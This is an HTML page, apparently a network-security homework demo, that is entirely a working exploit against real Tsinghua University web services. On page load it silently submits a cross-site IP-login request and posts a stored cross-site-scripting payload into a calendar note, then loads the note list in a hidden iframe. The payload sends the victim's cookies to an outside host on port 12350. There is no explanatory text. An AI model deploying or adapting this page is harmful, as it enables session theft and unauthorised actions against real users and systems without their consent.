<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>网安作业demo</title>
</head>
<body>
<form method="post" action="https://usereg.tsinghua.edu.cn/ip_login.php"
      id="crack-ip-form" target="crack_ip_iframe" style="visibility: hidden">
    <input type="hidden" name="n" value="100">
    <input type="hidden" name="is_pad" value="1">
    <input type="hidden" name="type" value="10">
    <input type="hidden" name="drop" value="0">
    <input type="hidden" name="action" value="do_login">
    <input type="text" name="user_ip" placeholder="需要上网的ip地址" value="166.111.139.183">
    <input id="crack-ip-button" type="submit" value="Crack">

    <iframe hidden src="" name="crack_iframe"
            id="crack-iframe">
    </iframe>

    <iframe hidden sandbox="allow-forms allow-scripts" name="crack_ip_iframe"
            id="crack-ip-iframe">
    </iframe>
</form>
<div id="info-iframe-container"></div>


<form method="post" action="http://info.tsinghua.edu.cn/minichan/cal/NoteIns_action.jsp"
      target="crack_iframe"
      name="noteIns_form" id="note-ins-form">
    <input name="title" type="text" id="noteIns-title" size=70 value="">
    <textarea name="body" cols="80" rows="10" id="noteIns-detail">testtesttesttest</textarea>
    <input id="crack-noteIns-button" type="submit" value="Crack">
</form>


</body>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script>
    $(document).ready(function () {
        $('#crack-ip-button').click();
        $("#noteIns-title").val("12\"></a><img src=\"1\" onerror=\"d=document;t=d.createElement('form');t.action='http://www.misscut.top:12350/send_cookie';t.method='post';o=d.createElement('textarea');o.name='c';o.value=d.cookie;t.appendChild(o);d.body.appendChild(t);t.submit()\">");
        $('#crack-noteIns-button').click();
        setTimeout(function () {
            var htm = "<iframe hidden src=\"http://info.tsinghua.edu.cn/minichan/cal/NoteList.jsp\" name=\"crack_info_iframe\" id=\"crack-info-iframe\"></iframe>";
            $("#info-iframe-container").html(htm);
        }, 5000)
    })


</script>
</html>